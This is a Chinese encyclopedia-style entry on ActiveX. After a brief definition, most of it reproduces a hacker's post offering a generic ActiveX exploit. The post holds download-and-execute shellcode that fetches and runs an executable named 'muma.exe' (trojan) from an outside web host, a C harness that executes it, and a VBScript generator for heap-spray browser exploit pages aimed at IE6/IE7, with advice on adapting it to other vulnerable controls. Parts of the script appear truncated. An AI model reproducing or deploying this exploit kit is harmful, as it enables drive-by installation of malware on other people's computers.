词条 | ActiveX |
释义 | § ActiveX ActiveX ActiveX组件实际上是指一些可执行的代码或一个程序,比如一个.EXE、.DLL或.OCX文件,通过ActiveX技术,程序员就能够将这些可复用的软件组装到应用程序或者服务程序中去,嵌入到网页中,随网页传送到客户的浏览器上,并在客户端执行。通过编程,ActiveX控件可以与Web浏览器交互或与客户交互。 § ActiveX漏洞通用Exploit 终于在milw0rm找到了一个不错的shellcode,down&exec的,灰常好用!顺手写了一个C测试了下,结果是成功下载并执行了"木马",muma.exe是我用delphi写的一个简单的执行测试程序,无毒无害。 #include #include unsigned char shellcode[] = "\\xEB\\x54\\x8B\\x75\\x3C\\x8B\\x74\\x35\\x78\\x03\\xF5\\x56\\x8B\\x76\\x20\\x03" "\\xF5\\x33\\xC9\\x49\\x41\\xAD\\x33\\xDB\\x36\\x0F\\xBE\\x14\\x28\\x38\\xF2\\x74" "\\x08\\xC1\\xCB\\x0D\\x03\\xDA\\x40\\xEB\\xEF\\x3B\\xDF\\x75\\xE7\\x5E\\x8B\\x5E" "\\x24\\x03\\xDD\\x66\\x8B\\x0C\\x4B\\x8B\\x5E\\x1C\\x03\\xDD\\x8B\\x04\\x8B\\x03" "\\xC5\\xC3\\x75\\x72\\x6C\\x6D\\x6F\\x6E\\x2E\\x64\\x6C\\x6C\\x00\\x43\\x3A\\x5C" "\\x55\\x2e\\x65\\x78\\x65\\x00\\x33\\xC0\\x64\\x03\\x40\\x30\\x78\\x0C\\x8B\\x40" "\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\xEB\\x09\\x8B\\x40\\x34\\x8D\\x40\\x7C" "\\x8B\\x40\\x3C\\x95\\xBF\\x8E\\x4E\\x0E\\xEC\\xE8\\x84\\xFF\\xFF\\xFF\\x83\\xEC" "\\x04\\x83\\x2C\\x24\\x3C\\xFF\\xD0\\x95\\x50\\xBF\\x36\\x1A\\x2F\\x70\\xE8\\x6F" "\\xFF\\xFF\\xFF\\x8B\\x54\\x24\\xFC\\x8D\\x52\\xBA\\x33\\xDB\\x53\\x53\\x52\\xEB" "\\x24\\x53\\xFF\\xD0\\x5D\\xBF\\x98\\xFE\\x8A\\x0E\\xE8\\x53\\xFF\\xFF\\xFF\\x83" "\\xEC\\x04\\x83\\x2C\\x24\\x62\\xFF\\xD0\\xBF\\x7E\\xD8\\xE2\\x73\\xE8\\x40\\xFF" "\\xFF\\xFF\\x52\\xFF\\xD0\\xE8\\xD7\\xFF\\xFF\\xFF" "http://fenggou.net/muma.exe"; int main() { void (* code)(); //把ShellCode转换成一个参数为空,返回为空的函数指针,并调用 * (int *) & code = shellcode; code(); } 在学习ActiveX的时候读过联众的AX漏洞生成器,思路不错,但不知道什么原因,那个生成器的shellcode我并不能执行成功,索性将其shellcode与heap spray方法暴力分配内存的JS进行了修改,反正在我本机测试100%成功,XP SP2 IE6&IE7。 exeurl = InputBox( "Please input you want down&exec url:", "输入","http://fenggou.net/muma.exe" ) if exeurl "" then code="\\xEB\\x54\\x8B\\x75\\x3C\\x8B\\x74\\x35\\x78\\x03\\xF5\\x56\\x8B\\x76\\x20\\x03\\xF5\\x33\\xC9\\x49\\x41\\xAD\\x33\\xDB\\x36\\x0F\\xBE\\x14\\x28\\x38\\xF2\\x74\\x08\\xC1\\xCB\\x0D\\x03\\xDA\\x40\\xEB\\xEF\\x3B\\xDF\\x75\\xE7\\x5E\\x8B\\x5E\\x24\\x03\\xDD\\x66\\x8B\\x0C\\x4B\\x8B\\x5E\\x1C\\x03\\xDD\\x8B\\x04\\x8B\\x03\\xC5\\xC3\\x75\\x72\\x6C\\x6D\\x6F\\x6E\\x2E\\x64\\x6C\\x6C\\x00\\x43\\x3A\\x5C\\x55\\x2e\\x65\\x78\\x65\\x00\\x33\\xC0\\x64\\x03\\x40\\x30\\x78\\x0C\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\xEB\\x09\\x8B\\x40\\x34\\x8D\\x40\\x7C\\x8B\\x40\\x3C\\x95\\xBF\\x8E\\x4E\\x0E\\xEC\\xE8\\x84\\xFF\\xFF\\xFF\\x83\\xEC\\x04\\x83\\x2C\\x24\\x3C\\xFF\\xD0\\x95\\x50\\xBF\\x36\\x1A\\x2F\\x70\\xE8\\x6F\\xFF\\xFF\\xFF\\x8B\\x54\\x24\\xFC\\x8D\\x52\\xBA\\x33\\xDB\\x53\\x53\\x52\\xEB\\x24\\x53\\xFF\\xD0\\x5D\\xBF\\x98\\xFE\\x8A\\x0E\\xE8\\x53\\xFF\\xFF\\xFF\\x83\\xEC\\x04\\x83\\x2C\\x24\\x62\\xFF\\xD0\\xBF\\x7E\\xD8\\xE2\\x73\\xE8\\x40\\xFF\\xFF\\xFF\\x52\\xFF\\xD0\\xE8\\xD7\\xFF\\xFF\\xFF"&Unicode(exeurl&Chr(00)&Chr(00)) Function Unicode(str1) Dim str,temp str = "" For i=1 to len(str1) temp = Hex(AscW(Mid(str1,i,1))) If len(temp) " fileS.writeline "Sina" fileS.writeline "" fileS.writeline "" fileS.writeline "" fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");" fileS.writeline "var bigblock = unescape(""%u9090%u9090"");" fileS.writeline "var headersize = 20;" fileS.writeline "var slackspace = headersize+shellcode.length;" fileS.writeline "while (bigblock.length" fileS.writeline "" fileS.writeline "" files.Close Set fso=nothing end if 仍然使用VBS,修改成其他漏洞exp的时候修改buffer长度,与漏洞AX的classid与参数传递方法即可:) |
随便看 |
百科全书收录594082条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。